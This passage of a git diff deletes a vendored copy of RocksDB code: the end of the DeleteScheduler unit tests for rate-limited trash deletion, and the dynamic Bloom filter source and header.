-    trash_dir_ = test::TmpDir(env_) + "/delete_scheduler_trash";
-    DestroyAndCreateDir(trash_dir_);
-  }
-
-  ~DeleteSchedulerTest() {
-    rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-    rocksdb::SyncPoint::GetInstance()->LoadDependency({});
-    rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-    test::DestroyDir(env_, dummy_files_dir_);
-  }
-
-  void DestroyAndCreateDir(const std::string& dir) {
-    ASSERT_OK(test::DestroyDir(env_, dir));
-    EXPECT_OK(env_->CreateDir(dir));
-  }
-
-  int CountFilesInDir(const std::string& dir) {
-    std::vector<std::string> files_in_dir;
-    EXPECT_OK(env_->GetChildren(dir, &files_in_dir));
-    // Ignore "." and ".."
-    return static_cast<int>(files_in_dir.size()) - 2;
-  }
-
-  std::string NewDummyFile(const std::string& file_name, uint64_t size = 1024) {
-    std::string file_path = dummy_files_dir_ + "/" + file_name;
-    std::unique_ptr<WritableFile> f;
-    env_->NewWritableFile(file_path, &f, EnvOptions());
-    std::string data(size, 'A');
-    EXPECT_OK(f->Append(data));
-    EXPECT_OK(f->Close());
-    sst_file_mgr_->OnAddFile(file_path);
-    return file_path;
-  }
-
-  void NewDeleteScheduler() {
-    ASSERT_OK(env_->CreateDirIfMissing(trash_dir_));
-    sst_file_mgr_.reset(
-        new SstFileManagerImpl(env_, nullptr, trash_dir_, rate_bytes_per_sec_));
-    delete_scheduler_ = sst_file_mgr_->delete_scheduler();
-    // Tests in this file are for DeleteScheduler component and dont create any
-    // DBs, so we need to use set this value to 100% (instead of default 25%)
-    delete_scheduler_->TEST_SetMaxTrashDBRatio(1.1);
-  }
-
-  Env* env_;
-  std::string dummy_files_dir_;
-  std::string trash_dir_;
-  int64_t rate_bytes_per_sec_;
-  DeleteScheduler* delete_scheduler_;
-  std::unique_ptr<SstFileManagerImpl> sst_file_mgr_;
-};
-
-// Test the basic functionality of DeleteScheduler (Rate Limiting).
-// 1- Create 100 dummy files
-// 2- Delete the 100 dummy files using DeleteScheduler
-// --- Hold DeleteScheduler::BackgroundEmptyTrash ---
-// 3- Wait for DeleteScheduler to delete all files in trash
-// 4- Verify that BackgroundEmptyTrash used to correct penlties for the files
-// 5- Make sure that all created files were completely deleted
-TEST_F(DeleteSchedulerTest, BasicRateLimiting) {
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"DeleteSchedulerTest::BasicRateLimiting:1",
-       "DeleteScheduler::BackgroundEmptyTrash"},
-  });
-
-  std::vector<uint64_t> penalties;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DeleteScheduler::BackgroundEmptyTrash:Wait",
-      [&](void* arg) { penalties.push_back(*(static_cast<uint64_t*>(arg))); });
-
-  int num_files = 100;  // 100 files
-  uint64_t file_size = 1024;  // every file is 1 kb
-  std::vector<uint64_t> delete_kbs_per_sec = {512, 200, 100, 50, 25};
-
-  for (size_t t = 0; t < delete_kbs_per_sec.size(); t++) {
-    penalties.clear();
-    rocksdb::SyncPoint::GetInstance()->ClearTrace();
-    rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-    DestroyAndCreateDir(dummy_files_dir_);
-    rate_bytes_per_sec_ = delete_kbs_per_sec[t] * 1024;
-    NewDeleteScheduler();
-
-    // Create 100 dummy files, every file is 1 Kb
-    std::vector<std::string> generated_files;
-    for (int i = 0; i < num_files; i++) {
-      std::string file_name = "file" + ToString(i) + ".data";
-      generated_files.push_back(NewDummyFile(file_name, file_size));
-    }
-
-    // Delete dummy files and measure time spent to empty trash
-    for (int i = 0; i < num_files; i++) {
-      ASSERT_OK(delete_scheduler_->DeleteFile(generated_files[i]));
-    }
-    ASSERT_EQ(CountFilesInDir(dummy_files_dir_), 0);
-
-    uint64_t delete_start_time = env_->NowMicros();
-    TEST_SYNC_POINT("DeleteSchedulerTest::BasicRateLimiting:1");
-    delete_scheduler_->WaitForEmptyTrash();
-    uint64_t time_spent_deleting = env_->NowMicros() - delete_start_time;
-
-    auto bg_errors = delete_scheduler_->GetBackgroundErrors();
-    ASSERT_EQ(bg_errors.size(), 0);
-
-    uint64_t total_files_size = 0;
-    uint64_t expected_penlty = 0;
-    ASSERT_EQ(penalties.size(), num_files);
-    for (int i = 0; i < num_files; i++) {
-      total_files_size += file_size;
-      expected_penlty = ((total_files_size * 1000000) / rate_bytes_per_sec_);
-      ASSERT_EQ(expected_penlty, penalties[i]);
-    }
-    ASSERT_GT(time_spent_deleting, expected_penlty * 0.9);
-
-    ASSERT_EQ(CountFilesInDir(trash_dir_), 0);
-    rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  }
-}
-
-// Same as the BasicRateLimiting test but delete files in multiple threads.
-// 1- Create 100 dummy files
-// 2- Delete the 100 dummy files using DeleteScheduler using 10 threads
-// --- Hold DeleteScheduler::BackgroundEmptyTrash ---
-// 3- Wait for DeleteScheduler to delete all files in queue
-// 4- Verify that BackgroundEmptyTrash used to correct penlties for the files
-// 5- Make sure that all created files were completely deleted
-TEST_F(DeleteSchedulerTest, RateLimitingMultiThreaded) {
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"DeleteSchedulerTest::RateLimitingMultiThreaded:1",
-       "DeleteScheduler::BackgroundEmptyTrash"},
-  });
-
-  std::vector<uint64_t> penalties;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DeleteScheduler::BackgroundEmptyTrash:Wait",
-      [&](void* arg) { penalties.push_back(*(static_cast<uint64_t*>(arg))); });
-
-  int thread_cnt = 10;
-  int num_files = 10;  // 10 files per thread
-  uint64_t file_size = 1024;  // every file is 1 kb
-
-  std::vector<uint64_t> delete_kbs_per_sec = {512, 200, 100, 50, 25};
-  for (size_t t = 0; t < delete_kbs_per_sec.size(); t++) {
-    penalties.clear();
-    rocksdb::SyncPoint::GetInstance()->ClearTrace();
-    rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-    DestroyAndCreateDir(dummy_files_dir_);
-    rate_bytes_per_sec_ = delete_kbs_per_sec[t] * 1024;
-    NewDeleteScheduler();
-
-    // Create 100 dummy files, every file is 1 Kb
-    std::vector<std::string> generated_files;
-    for (int i = 0; i < num_files * thread_cnt; i++) {
-      std::string file_name = "file" + ToString(i) + ".data";
-      generated_files.push_back(NewDummyFile(file_name, file_size));
-    }
-
-    // Delete dummy files using 10 threads and measure time spent to empty trash
-    std::atomic<int> thread_num(0);
-    std::vector<port::Thread> threads;
-    std::function<void()> delete_thread = [&]() {
-      int idx = thread_num.fetch_add(1);
-      int range_start = idx * num_files;
-      int range_end = range_start + num_files;
-      for (int j = range_start; j < range_end; j++) {
-        ASSERT_OK(delete_scheduler_->DeleteFile(generated_files[j]));
-      }
-    };
-
-    for (int i = 0; i < thread_cnt; i++) {
-      threads.emplace_back(delete_thread);
-    }
-
-    for (size_t i = 0; i < threads.size(); i++) {
-      threads[i].join();
-    }
-
-    uint64_t delete_start_time = env_->NowMicros();
-    TEST_SYNC_POINT("DeleteSchedulerTest::RateLimitingMultiThreaded:1");
-    delete_scheduler_->WaitForEmptyTrash();
-    uint64_t time_spent_deleting = env_->NowMicros() - delete_start_time;
-
-    auto bg_errors = delete_scheduler_->GetBackgroundErrors();
-    ASSERT_EQ(bg_errors.size(), 0);
-
-    uint64_t total_files_size = 0;
-    uint64_t expected_penlty = 0;
-    ASSERT_EQ(penalties.size(), num_files * thread_cnt);
-    for (int i = 0; i < num_files * thread_cnt; i++) {
-      total_files_size += file_size;
-      expected_penlty = ((total_files_size * 1000000) / rate_bytes_per_sec_);
-      ASSERT_EQ(expected_penlty, penalties[i]);
-    }
-    ASSERT_GT(time_spent_deleting, expected_penlty * 0.9);
-
-    ASSERT_EQ(CountFilesInDir(dummy_files_dir_), 0);
-    ASSERT_EQ(CountFilesInDir(trash_dir_), 0);
-    rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  }
-}
-
-// Disable rate limiting by setting rate_bytes_per_sec_ to 0 and make sure
-// that when DeleteScheduler delete a file it delete it immediately and dont
-// move it to trash
-TEST_F(DeleteSchedulerTest, DisableRateLimiting) {
-  int bg_delete_file = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DeleteScheduler::DeleteTrashFile:DeleteFile",
-      [&](void* arg) { bg_delete_file++; });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  rate_bytes_per_sec_ = 0;
-  NewDeleteScheduler();
-
-  for (int i = 0; i < 10; i++) {
-    // Every file we delete will be deleted immediately
-    std::string dummy_file = NewDummyFile("dummy.data");
-    ASSERT_OK(delete_scheduler_->DeleteFile(dummy_file));
-    ASSERT_TRUE(env_->FileExists(dummy_file).IsNotFound());
-    ASSERT_EQ(CountFilesInDir(dummy_files_dir_), 0);
-    ASSERT_EQ(CountFilesInDir(trash_dir_), 0);
-  }
-
-  ASSERT_EQ(bg_delete_file, 0);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-// Testing that moving files to trash with the same name is not a problem
-// 1- Create 10 files with the same name "conflict.data"
-// 2- Delete the 10 files using DeleteScheduler
-// 3- Make sure that trash directory contain 10 files ("conflict.data" x 10)
-// --- Hold DeleteScheduler::BackgroundEmptyTrash ---
-// 4- Make sure that files are deleted from trash
-TEST_F(DeleteSchedulerTest, ConflictNames) {
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"DeleteSchedulerTest::ConflictNames:1",
-       "DeleteScheduler::BackgroundEmptyTrash"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  rate_bytes_per_sec_ = 1024 * 1024;  // 1 Mb/sec
-  NewDeleteScheduler();
-
-  // Create "conflict.data" and move it to trash 10 times
-  for (int i = 0; i < 10; i++) {
-    std::string dummy_file = NewDummyFile("conflict.data");
-    ASSERT_OK(delete_scheduler_->DeleteFile(dummy_file));
-  }
-  ASSERT_EQ(CountFilesInDir(dummy_files_dir_), 0);
-  // 10 files ("conflict.data" x 10) in trash
-  ASSERT_EQ(CountFilesInDir(trash_dir_), 10);
-
-  // Hold BackgroundEmptyTrash
-  TEST_SYNC_POINT("DeleteSchedulerTest::ConflictNames:1");
-  delete_scheduler_->WaitForEmptyTrash();
-  ASSERT_EQ(CountFilesInDir(trash_dir_), 0);
-
-  auto bg_errors = delete_scheduler_->GetBackgroundErrors();
-  ASSERT_EQ(bg_errors.size(), 0);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-// 1- Create 10 dummy files
-// 2- Delete the 10 files using DeleteScheduler (move them to trsah)
-// 3- Delete the 10 files directly (using env_->DeleteFile)
-// --- Hold DeleteScheduler::BackgroundEmptyTrash ---
-// 4- Make sure that DeleteScheduler failed to delete the 10 files and
-//    reported 10 background errors
-TEST_F(DeleteSchedulerTest, BackgroundError) {
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"DeleteSchedulerTest::BackgroundError:1",
-       "DeleteScheduler::BackgroundEmptyTrash"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  rate_bytes_per_sec_ = 1024 * 1024;  // 1 Mb/sec
-  NewDeleteScheduler();
-
-  // Generate 10 dummy files and move them to trash
-  for (int i = 0; i < 10; i++) {
-    std::string file_name = "data_" + ToString(i) + ".data";
-    ASSERT_OK(delete_scheduler_->DeleteFile(NewDummyFile(file_name)));
-  }
-  ASSERT_EQ(CountFilesInDir(dummy_files_dir_), 0);
-  ASSERT_EQ(CountFilesInDir(trash_dir_), 10);
-
-  // Delete 10 files from trash, this will cause background errors in
-  // BackgroundEmptyTrash since we already deleted the files it was
-  // goind to delete
-  for (int i = 0; i < 10; i++) {
-    std::string file_name = "data_" + ToString(i) + ".data";
-    ASSERT_OK(env_->DeleteFile(trash_dir_ + "/" + file_name));
-  }
-
-  // Hold BackgroundEmptyTrash
-  TEST_SYNC_POINT("DeleteSchedulerTest::BackgroundError:1");
-  delete_scheduler_->WaitForEmptyTrash();
-  auto bg_errors = delete_scheduler_->GetBackgroundErrors();
-  ASSERT_EQ(bg_errors.size(), 10);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-// 1- Create 10 dummy files
-// 2- Delete 10 dummy files using DeleteScheduler
-// 3- Wait for DeleteScheduler to delete all files in queue
-// 4- Make sure all files in trash directory were deleted
-// 5- Repeat previous steps 5 times
-TEST_F(DeleteSchedulerTest, StartBGEmptyTrashMultipleTimes) {
-  int bg_delete_file = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DeleteScheduler::DeleteTrashFile:DeleteFile",
-      [&](void* arg) { bg_delete_file++; });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  rate_bytes_per_sec_ = 1024 * 1024;  // 1 MB / sec
-  NewDeleteScheduler();
-
-  // Move files to trash, wait for empty trash, start again
-  for (int run = 1; run <= 5; run++) {
-    // Generate 10 dummy files and move them to trash
-    for (int i = 0; i < 10; i++) {
-      std::string file_name = "data_" + ToString(i) + ".data";
-      ASSERT_OK(delete_scheduler_->DeleteFile(NewDummyFile(file_name)));
-    }
-    ASSERT_EQ(CountFilesInDir(dummy_files_dir_), 0);
-    delete_scheduler_->WaitForEmptyTrash();
-    ASSERT_EQ(bg_delete_file, 10 * run);
-    ASSERT_EQ(CountFilesInDir(trash_dir_), 0);
-
-    auto bg_errors = delete_scheduler_->GetBackgroundErrors();
-    ASSERT_EQ(bg_errors.size(), 0);
-  }
-
-  ASSERT_EQ(bg_delete_file, 50);
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-}
-
-// 1- Create a DeleteScheduler with very slow rate limit (1 Byte / sec)
-// 2- Delete 100 files using DeleteScheduler
-// 3- Delete the DeleteScheduler (call the destructor while queue is not empty)
-// 4- Make sure that not all files were deleted from trash and that
-//    DeleteScheduler background thread did not delete all files
-TEST_F(DeleteSchedulerTest, DestructorWithNonEmptyQueue) {
-  int bg_delete_file = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DeleteScheduler::DeleteTrashFile:DeleteFile",
-      [&](void* arg) { bg_delete_file++; });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  rate_bytes_per_sec_ = 1;  // 1 Byte / sec
-  NewDeleteScheduler();
-
-  for (int i = 0; i < 100; i++) {
-    std::string file_name = "data_" + ToString(i) + ".data";
-    ASSERT_OK(delete_scheduler_->DeleteFile(NewDummyFile(file_name)));
-  }
-
-  // Deleting 100 files will need >28 hours to delete
-  // we will delete the DeleteScheduler while delete queue is not empty
-  sst_file_mgr_.reset();
-
-  ASSERT_LT(bg_delete_file, 100);
-  ASSERT_GT(CountFilesInDir(trash_dir_), 0);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-// 1- Delete the trash directory
-// 2- Delete 10 files using DeleteScheduler
-// 3- Make sure that the 10 files were deleted immediately since DeleteScheduler
-//    failed to move them to trash directory
-TEST_F(DeleteSchedulerTest, MoveToTrashError) {
-  int bg_delete_file = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DeleteScheduler::DeleteTrashFile:DeleteFile",
-      [&](void* arg) { bg_delete_file++; });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  rate_bytes_per_sec_ = 1024;  // 1 Kb / sec
-  NewDeleteScheduler();
-
-  // We will delete the trash directory, that mean that DeleteScheduler wont
-  // be able to move files to trash and will delete files them immediately.
-  ASSERT_OK(test::DestroyDir(env_, trash_dir_));
-  for (int i = 0; i < 10; i++) {
-    std::string file_name = "data_" + ToString(i) + ".data";
-    ASSERT_OK(delete_scheduler_->DeleteFile(NewDummyFile(file_name)));
-  }
-
-  ASSERT_EQ(CountFilesInDir(dummy_files_dir_), 0);
-  ASSERT_EQ(bg_delete_file, 0);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(DeleteSchedulerTest, DISABLED_DynamicRateLimiting1) {
-  std::vector<uint64_t> penalties;
-  int bg_delete_file = 0;
-  int fg_delete_file = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DeleteScheduler::DeleteTrashFile:DeleteFile",
-      [&](void* arg) { bg_delete_file++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DeleteScheduler::DeleteFile",
-      [&](void* arg) { fg_delete_file++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DeleteScheduler::BackgroundEmptyTrash:Wait",
-      [&](void* arg) { penalties.push_back(*(static_cast<int*>(arg))); });
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"DeleteSchedulerTest::DynamicRateLimiting1:1",
-       "DeleteScheduler::BackgroundEmptyTrash"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  rate_bytes_per_sec_ = 0;  // Disable rate limiting initially
-  NewDeleteScheduler();
-
-
-  int num_files = 10;  // 10 files
-  uint64_t file_size = 1024;  // every file is 1 kb
-
-  std::vector<int64_t> delete_kbs_per_sec = {512, 200, 0, 100, 50, -2, 25};
-  for (size_t t = 0; t < delete_kbs_per_sec.size(); t++) {
-    penalties.clear();
-    bg_delete_file = 0;
-    fg_delete_file = 0;
-    rocksdb::SyncPoint::GetInstance()->ClearTrace();
-    rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-    DestroyAndCreateDir(dummy_files_dir_);
-    rate_bytes_per_sec_ = delete_kbs_per_sec[t] * 1024;
-    delete_scheduler_->SetRateBytesPerSecond(rate_bytes_per_sec_);
-
-    // Create 100 dummy files, every file is 1 Kb
-    std::vector<std::string> generated_files;
-    for (int i = 0; i < num_files; i++) {
-      std::string file_name = "file" + ToString(i) + ".data";
-      generated_files.push_back(NewDummyFile(file_name, file_size));
-    }
-
-    // Delete dummy files and measure time spent to empty trash
-    for (int i = 0; i < num_files; i++) {
-      ASSERT_OK(delete_scheduler_->DeleteFile(generated_files[i]));
-    }
-    ASSERT_EQ(CountFilesInDir(dummy_files_dir_), 0);
-
-    if (rate_bytes_per_sec_ > 0) {
-      uint64_t delete_start_time = env_->NowMicros();
-      TEST_SYNC_POINT("DeleteSchedulerTest::DynamicRateLimiting1:1");
-      delete_scheduler_->WaitForEmptyTrash();
-      uint64_t time_spent_deleting = env_->NowMicros() - delete_start_time;
-
-      auto bg_errors = delete_scheduler_->GetBackgroundErrors();
-      ASSERT_EQ(bg_errors.size(), 0);
-
-      uint64_t total_files_size = 0;
-      uint64_t expected_penlty = 0;
-      ASSERT_EQ(penalties.size(), num_files);
-      for (int i = 0; i < num_files; i++) {
-        total_files_size += file_size;
-        expected_penlty = ((total_files_size * 1000000) / rate_bytes_per_sec_);
-        ASSERT_EQ(expected_penlty, penalties[i]);
-      }
-      ASSERT_GT(time_spent_deleting, expected_penlty * 0.9);
-      ASSERT_EQ(bg_delete_file, num_files);
-      ASSERT_EQ(fg_delete_file, 0);
-    } else {
-      ASSERT_EQ(penalties.size(), 0);
-      ASSERT_EQ(bg_delete_file, 0);
-      ASSERT_EQ(fg_delete_file, num_files);
-    }
-
-    ASSERT_EQ(CountFilesInDir(trash_dir_), 0);
-    rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  }
-}
-
-TEST_F(DeleteSchedulerTest, ImmediateDeleteOn25PercDBSize) {
-  int bg_delete_file = 0;
-  int fg_delete_file = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DeleteScheduler::DeleteTrashFile:DeleteFile",
-      [&](void* arg) { bg_delete_file++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DeleteScheduler::DeleteFile", [&](void* arg) { fg_delete_file++; });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  int num_files = 100;  // 100 files
-  uint64_t file_size = 1024 * 10; // 100 KB as a file size
-  rate_bytes_per_sec_ = 1;  // 1 byte per sec (very slow trash delete)
-
-  NewDeleteScheduler();
-  delete_scheduler_->TEST_SetMaxTrashDBRatio(0.25);
-
-  std::vector<std::string> generated_files;
-  for (int i = 0; i < num_files; i++) {
-    std::string file_name = "file" + ToString(i) + ".data";
-    generated_files.push_back(NewDummyFile(file_name, file_size));
-  }
-
-  for (std::string& file_name : generated_files) {
-    delete_scheduler_->DeleteFile(file_name);
-  }
-
-  // When we end up with 26 files in trash we will start
-  // deleting new files immediately
-  ASSERT_EQ(fg_delete_file, 74);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-int main(int argc, char** argv) {
-  printf("DeleteScheduler is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/util/dynamic_bloom.cc b/thirdparty/rocksdb/util/dynamic_bloom.cc
deleted file mode 100644
index 7c296cb..0000000
--- a/thirdparty/rocksdb/util/dynamic_bloom.cc
+++ /dev/null
@@ -1,82 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "dynamic_bloom.h"
-
-#include <algorithm>
-
-#include "port/port.h"
-#include "rocksdb/slice.h"
-#include "util/allocator.h"
-#include "util/hash.h"
-
-namespace rocksdb {
-
-namespace {
-
-uint32_t GetTotalBitsForLocality(uint32_t total_bits) {
-  uint32_t num_blocks =
-      (total_bits + CACHE_LINE_SIZE * 8 - 1) / (CACHE_LINE_SIZE * 8);
-
-  // Make num_blocks an odd number to make sure more bits are involved
-  // when determining which block.
-  if (num_blocks % 2 == 0) {
-    num_blocks++;
-  }
-
-  return num_blocks * (CACHE_LINE_SIZE * 8);
-}
-}
-
-DynamicBloom::DynamicBloom(Allocator* allocator, uint32_t total_bits,
-                           uint32_t locality, uint32_t num_probes,
-                           uint32_t (*hash_func)(const Slice& key),
-                           size_t huge_page_tlb_size,
-                           Logger* logger)
-    : DynamicBloom(num_probes, hash_func) {
-  SetTotalBits(allocator, total_bits, locality, huge_page_tlb_size, logger);
-}
-
-DynamicBloom::DynamicBloom(uint32_t num_probes,
-                           uint32_t (*hash_func)(const Slice& key))
-    : kTotalBits(0),
-      kNumBlocks(0),
-      kNumProbes(num_probes),
-      hash_func_(hash_func == nullptr ? &BloomHash : hash_func) {}
-
-void DynamicBloom::SetRawData(unsigned char* raw_data, uint32_t total_bits,
-                              uint32_t num_blocks) {
-  data_ = reinterpret_cast<std::atomic<uint8_t>*>(raw_data);
-  kTotalBits = total_bits;
-  kNumBlocks = num_blocks;
-}
-
-void DynamicBloom::SetTotalBits(Allocator* allocator,
-                                uint32_t total_bits, uint32_t locality,
-                                size_t huge_page_tlb_size,
-                                Logger* logger) {
-  kTotalBits = (locality > 0) ? GetTotalBitsForLocality(total_bits)
-                              : (total_bits + 7) / 8 * 8;
-  kNumBlocks = (locality > 0) ? (kTotalBits / (CACHE_LINE_SIZE * 8)) : 0;
-
-  assert(kNumBlocks > 0 || kTotalBits > 0);
-  assert(kNumProbes > 0);
-
-  uint32_t sz = kTotalBits / 8;
-  if (kNumBlocks > 0) {
-    sz += CACHE_LINE_SIZE - 1;
-  }
-  assert(allocator);
-
-  char* raw = allocator->AllocateAligned(sz, huge_page_tlb_size, logger);
-  memset(raw, 0, sz);
-  auto cache_line_offset = reinterpret_cast<uintptr_t>(raw) % CACHE_LINE_SIZE;
-  if (kNumBlocks > 0 && cache_line_offset > 0) {
-    raw += CACHE_LINE_SIZE - cache_line_offset;
-  }
-  data_ = reinterpret_cast<std::atomic<uint8_t>*>(raw);
-}
-
-}  // rocksdb
diff --git a/thirdparty/rocksdb/util/dynamic_bloom.h b/thirdparty/rocksdb/util/dynamic_bloom.h
deleted file mode 100644
index 17325dd..0000000
--- a/thirdparty/rocksdb/util/dynamic_bloom.h
+++ /dev/null
@@ -1,191 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <string>
-
-#include "rocksdb/slice.h"
-
-#include "port/port.h"
-
-#include <atomic>
-#include <memory>
-
-namespace rocksdb {
-
-class Slice;
-class Allocator;
-class Logger;
-
-class DynamicBloom {
- public:
-  // allocator: pass allocator to bloom filter, hence trace the usage of memory
-  // total_bits: fixed total bits for the bloom
-  // num_probes: number of hash probes for a single key
-  // locality:  If positive, optimize for cache line locality, 0 otherwise.
-  // hash_func:  customized hash function
-  // huge_page_tlb_size:  if >0, try to allocate bloom bytes from huge page TLB
-  //                      within this page size. Need to reserve huge pages for
-  //                      it to be allocated, like:
-  //                         sysctl -w vm.nr_hugepages=20
-  //                     See linux doc Documentation/vm/hugetlbpage.txt
-  explicit DynamicBloom(Allocator* allocator,
-                        uint32_t total_bits, uint32_t locality = 0,
-                        uint32_t num_probes = 6,
-                        uint32_t (*hash_func)(const Slice& key) = nullptr,
-                        size_t huge_page_tlb_size = 0,
-                        Logger* logger = nullptr);
-
-  explicit DynamicBloom(uint32_t num_probes = 6,
-                        uint32_t (*hash_func)(const Slice& key) = nullptr);
-
-  void SetTotalBits(Allocator* allocator, uint32_t total_bits,
-                    uint32_t locality, size_t huge_page_tlb_size,
-                    Logger* logger);
-
-  ~DynamicBloom() {}
-
-  // Assuming single threaded access to this function.
-  void Add(const Slice& key);
-
-  // Like Add, but may be called concurrent with other functions.
-  void AddConcurrently(const Slice& key);
-
-  // Assuming single threaded access to this function.
-  void AddHash(uint32_t hash);
-
-  // Like AddHash, but may be called concurrent with other functions.
-  void AddHashConcurrently(uint32_t hash);
-
-  // Multithreaded access to this function is OK
-  bool MayContain(const Slice& key) const;
-
-  // Multithreaded access to this function is OK
-  bool MayContainHash(uint32_t hash) const;
-
-  void Prefetch(uint32_t h);
-
-  uint32_t GetNumBlocks() const { return kNumBlocks; }
-
-  Slice GetRawData() const {
-    return Slice(reinterpret_cast<char*>(data_), GetTotalBits() / 8);
-  }
-
-  void SetRawData(unsigned char* raw_data, uint32_t total_bits,
-                  uint32_t num_blocks = 0);
-
-  uint32_t GetTotalBits() const { return kTotalBits; }
-
-  bool IsInitialized() const { return kNumBlocks > 0 || kTotalBits > 0; }
-
- private:
-  uint32_t kTotalBits;
-  uint32_t kNumBlocks;
-  const uint32_t kNumProbes;
-
-  uint32_t (*hash_func_)(const Slice& key);
-  std::atomic<uint8_t>* data_;
-
-  // or_func(ptr, mask) should effect *ptr |= mask with the appropriate
-  // concurrency safety, working with bytes.
-  template <typename OrFunc>
-  void AddHash(uint32_t hash, const OrFunc& or_func);
-};
-
-inline void DynamicBloom::Add(const Slice& key) { AddHash(hash_func_(key)); }
-
-inline void DynamicBloom::AddConcurrently(const Slice& key) {
-  AddHashConcurrently(hash_func_(key));
-}
-
-inline void DynamicBloom::AddHash(uint32_t hash) {
-  AddHash(hash, [](std::atomic<uint8_t>* ptr, uint8_t mask) {
-    ptr->store(ptr->load(std::memory_order_relaxed) | mask,
-               std::memory_order_relaxed);
-  });
-}
-
-inline void DynamicBloom::AddHashConcurrently(uint32_t hash) {
-  AddHash(hash, [](std::atomic<uint8_t>* ptr, uint8_t mask) {
-    // Happens-before between AddHash and MaybeContains is handled by
-    // access to versions_->LastSequence(), so all we have to do here is
-    // avoid races (so we don't give the compiler a license to mess up
-    // our code) and not lose bits.  std::memory_order_relaxed is enough
-    // for that.
-    if ((mask & ptr->load(std::memory_order_relaxed)) != mask) {
-      ptr->fetch_or(mask, std::memory_order_relaxed);
-    }
-  });
-}
-
-inline bool DynamicBloom::MayContain(const Slice& key) const {
-  return (MayContainHash(hash_func_(key)));
-}
-
-inline void DynamicBloom::Prefetch(uint32_t h) {
-  if (kNumBlocks != 0) {
-    uint32_t b = ((h >> 11 | (h << 21)) % kNumBlocks) * (CACHE_LINE_SIZE * 8);
-    PREFETCH(&(data_[b / 8]), 0, 3);
-  }
-}
-
-inline bool DynamicBloom::MayContainHash(uint32_t h) const {
-  assert(IsInitialized());
-  const uint32_t delta = (h >> 17) | (h << 15);  // Rotate right 17 bits
-  if (kNumBlocks != 0) {
-    uint32_t b = ((h >> 11 | (h << 21)) % kNumBlocks) * (CACHE_LINE_SIZE * 8);
-    for (uint32_t i = 0; i < kNumProbes; ++i) {
-      // Since CACHE_LINE_SIZE is defined as 2^n, this line will be optimized
-      //  to a simple and operation by compiler.
-      const uint32_t bitpos = b + (h % (CACHE_LINE_SIZE * 8));
-      uint8_t byteval = data_[bitpos / 8].load(std::memory_order_relaxed);
-      if ((byteval & (1 << (bitpos % 8))) == 0) {
-        return false;
-      }
-      // Rotate h so that we don't reuse the same bytes.
-      h = h / (CACHE_LINE_SIZE * 8) +
-          (h % (CACHE_LINE_SIZE * 8)) * (0x20000000U / CACHE_LINE_SIZE);
-      h += delta;
-    }
-  } else {
-    for (uint32_t i = 0; i < kNumProbes; ++i) {
-      const uint32_t bitpos = h % kTotalBits;
-      uint8_t byteval = data_[bitpos / 8].load(std::memory_order_relaxed);
-      if ((byteval & (1 << (bitpos % 8))) == 0) {
-        return false;
-      }
-      h += delta;
-    }
-  }
-  return true;
-}
-
-template <typename OrFunc>
-inline void DynamicBloom::AddHash(uint32_t h, const OrFunc& or_func) {
-  assert(IsInitialized());
-  const uint32_t delta = (h >> 17) | (h << 15);  // Rotate right 17 bits
-  if (kNumBlocks != 0) {
-    uint32_t b = ((h >> 11 | (h << 21)) % kNumBlocks) * (CACHE_LINE_SIZE * 8);
